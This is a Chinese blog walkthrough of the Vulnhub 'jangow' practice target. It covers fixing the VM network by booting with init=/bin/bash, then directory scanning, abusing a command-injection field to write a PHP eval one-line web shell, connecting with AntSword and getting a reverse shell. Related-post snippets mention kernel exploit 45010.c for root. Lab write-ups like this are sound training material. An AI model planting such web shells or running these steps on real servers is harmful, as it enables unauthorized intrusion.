Vulhub--jangow靶机攻略

最新推荐文章于 2025-08-05 19:41:49 发布
最新推荐文章于 2025-08-05 19:41:49 发布
阅读量381 收藏 1
点赞数 13
CC 4.0 BY-SA版权
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_85578339/article/details/146482747

1.搭建环境

部分vmware有配置问题,需要修改网卡信息,重启dhcp服务

在系统启动时(长按shift键)直到显示以下界面,选择第二个,按回车

在ro后面加 rw signin init=/bin/bash

按ctrl+x 保存

cd etc/network
vim interfaces

修改为ens33

保存就行,这里的:也按不了,所以我们在按完esc后按shift+?就可以输入:wq  重启靶机即可

2.扫描靶机ip

3.浏览器访问靶机ip

4.扫描敏感目录

依次访问

5.点击site目录查看

发现注入点,尝试输入whoami查看

6.尝试写入一句话木马

echo '<?php @eval($_POST["cmd"]); ?>' >> 1.php

访问查看是否传成功

7.蚁剑连接

8.反弹shell

ksk852
关注
vulhub靶场-Jangow
mashiro_hibiki的博客
03-13 838
发现Local Privilege Escalation(本地权限升级)漏洞,在网上找到了对应了漏洞编号为CVE-2017-16995,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。猜测此处存在命令执行或文件包含漏洞,尝试了一下../../../../../../../etc/passwd没有回写,输入whoami命令出现回写。使用ping确认kali是与靶场网络连通的,注意kali要与靶机在同一网段。
Vulhub-Jangow靶机通关攻略
qq_65852138的博客
03-28 492
按ctrl+x进行保存,进入shell页面,输入passwd修改root用户密码(这一步必要不大)网站上的功能点都可以点击,但在点击Buscar时,是空白页,但是URL出出现了buscae的参数。将45010.c文件放到site目录下,并使用gcc进行编译,生成a.out文件。在html目录下的 .back文件,里面有jangow01数据库的账号密码。在site目录在写下反弹shell的php文件。再开机是来到这个页面,选择第二个,回车。运行a.out文件,获得root权限。在选择第二个,按e,进入编辑。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1261
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
vulnhub靶场实战(JANGOW:1.0.1)
blackguest07的博客
01-10 512
vulnhub实战(JANGOW:1.0.1)
记录下对vulhub靶机jangow的一次渗透测试
weixin_52020240的博客
03-11 5722
靶机地址 https://www.vulnhub.com/entry/jangow-101,754/ 难度:简单 靶机IP:192.168.21.150 kali IP:192.168.21.129 目标:两个flag 信息收集 扫描靶机开放的端口: nmap -A -p- 192.168.21.149 发现开放21和80端口 访问80端口主页面可以跳转的页面buscar 点击之后跳转 输入命令试一下发现可以执行命令 对网站进行目录扫描 dirb或者gobus
vulhub靶场jangow-01-1.0.1
qq_62486841的博客
03-25 486
ip为192.168.93.179。扫出21,80两个端口。
靶机练习 No.20 Vulnhub靶机 jangow 01 ftp登录 命令执行写入webshell php反弹shell 45010.c内核漏洞提权
YouthBelief的博客
01-20 3215
0x00 环境准备 下载链接 https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 靶机介绍 难度:简单 上架时间:2021年11月4日 提示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com 靶机配置 virtual box 启动,与kali配置同一网卡。 0x01 信息收集 靶机ip探测 端口服务识别 21/tcp ope
搭建Vulnhub靶机网络问题(获取不到IP)
05-31 613
这时候去看下靶机网络有没有问题。搭建好靶场后,在攻击机运行。
【靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
李火火的安全圈
05-30 1342
Vulnhub - JANGOW: 1.0.1 靶标实战
linux-系统日志查看指令systemctl
guchuanhang的专栏
08-05 320
本文介绍了Linux系统管理中的三个重要工具:systemctl用于管理系统服务,包括启动/停止服务和设置开机自启;journalctl用于查看systemd日志,支持按服务筛选和实时跟踪;以及基本日志查看和端口占用检查方法。文中还讲解了.service文件的存放位置差异,提供了常用命令参考和实用技巧,如查看Nginx进程启动时间、日志关键字搜索等。这些工具和技巧能有效帮助管理员进行日常系统维护和故障排查。
Linux 设备驱动程序(3)- 字符驱动(1)
qq_49477505的博客
08-02 1334
本文介绍了Linux字符设备驱动的开发流程,重点讲解了设备编号管理、核心数据结构及注册方法。字符设备驱动用于管理以字节流方式读写的设备,如串口、键盘等。开发时需处理主次设备号分配、file_operations结构定义、file/inode结构使用等关键环节。文章详细说明了静态/动态分配设备号的方法,以及通过cdev结构注册驱动的步骤(初始化、添加、创建节点等)。最后强调驱动卸载时要反向释放资源,包括删除设备文件、注销cdev结构等。整个流程体现了字符设备驱动如何在内核中建立设备编号与操作方法的关联机制。
Linux-进程优先级
m0_73936730的博客
08-04 703
简单的说优先级和权限的区别: 老规矩:先写个简单的进程代码: 进程优先级的修正数据,nice 值,nice其取值范围是-20至19,一共40个级别。新的优先级 = 优先级(默认80) + nice,这样,当nice值为负值的时候,那么该程序将会优先级值将变小,即其优先级会变高,则其越快被执行,所以调整进程优先级,在Linux下,就是调整进程nice值。再次修改nice值会失败,进程优先级不能经常修改我们 语法格式: 示例: 语法格式: 示例:
14.Linux : nfs与autofs的使用
最新发布
xie52的博客
08-05 411
【代码】14.Linux : nfs与autofs的使用。
linux2.6 和 unix-v6 源码实验
is0815的博客
08-03 1030
你可以通过实现 Linux 2.6.x 的源码级图形调试,能看到源码、变量、寄存器,非常适合研究内核启动过程。同理,可以编译 unix-v6 (https://github.com/mit-pdos/xv6-public.git)以下是使用xv6‑public(xv6 的 x86 版本)在 Ubuntu/Linux 上安装、编译、运行、调试的详细中文指南。如果你想使用 RISC‑V 版本(xv6‑riscv),后续内容里也有说明。面向 Intel x86 架构,使用 ELF 格式。
Linux9 root密码修改
xy021111的博客
08-01 267
linux行即quiet后面输入rd.break ctrl+x进入内核。
【实时Linux实战系列】无人驾驶系统中的实时决策支持
望获实时Linux系统
08-05 917
本文介绍了基于实时Linux系统的无人驾驶实时决策支持技术实现。主要内容包括:1)系统核心概念,包括实时任务特性及相关通信协议;2)开发环境配置,涵盖ROS、Python、OpenCV等工具的安装;3)关键功能实现,包括传感器数据处理、环境感知和路径规划;4)常见问题解决方案和实践建议。通过整合Raspberry Pi、NVIDIA Jetson等硬件及ROS等软件工具,构建了完整的无人驾驶决策系统。该技术可应用于自动驾驶汽车、智能交通等领域,为开发者提供了构建高效实时决策系统的完整解决方案。
linux系列---linux如何查看正在使用的所有端口(既列出部署的所有应用)】
-少年-的博客
08-01 224
n: Numeric,不解析服务名称,直接显示数字形式的端口号和IP地址(如显示 8080 而不是 http-alt),速度更快。-p: Processes,显示使用该 socket 的进程信息(PID和进程名),这个参数非常非常重要!使用方法同netstat,后面参数一样,用ss替换掉netstat即可。-l: 只显示正在 Listen (监听) 状态的 sockets。s: socket 的缩写,命令主体。-t: 显示 TCP sockets。-u: 显示 UDP sockets。
Linux Shell 命令详解
不会C++、害怕嵌入式且不爱看动漫的小趴菜
08-04 478
linux shell命令详细介绍和使用举例
Orange的运维学习日记--27.Linux RAID硬盘阵列详解
朱小弟cs6的博客
08-04 876
摘要:Linux RAID硬盘阵列技术详解 RAID(独立磁盘冗余阵列)技术通过组合多块磁盘实现性能提升和数据冗余。文章详细介绍了RAID的实现方式(软/硬/混合RAID)和常见等级:RAID0(条带化提升性能无冗余)、RAID1(镜像备份)、RAID5(分布式奇偶校验)、RAID6(双奇偶校验)、RAID10(镜像+条带)及其组合方案。通过表格对比了不同RAID等级在磁盘数要求、容错能力、性能表现和成本等方面的差异。最后以RHEL/CentOS7环境为例,展示了使用mdadm工具管理RAID0/1/5阵列
VulnHub-Tr0ll1靶机学习笔记与文档整理
资源摘要信息:"VulnHub-Tr0ll1.zip文件是一个包含了VulnHub-Tr0ll1靶机学习笔记及相关文档的压缩包。VulnHub是一个为安全研究人员和爱好者提供真实网络环境的平台,用于实践渗透测试技能。Tr0ll1是VulnHub上的一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值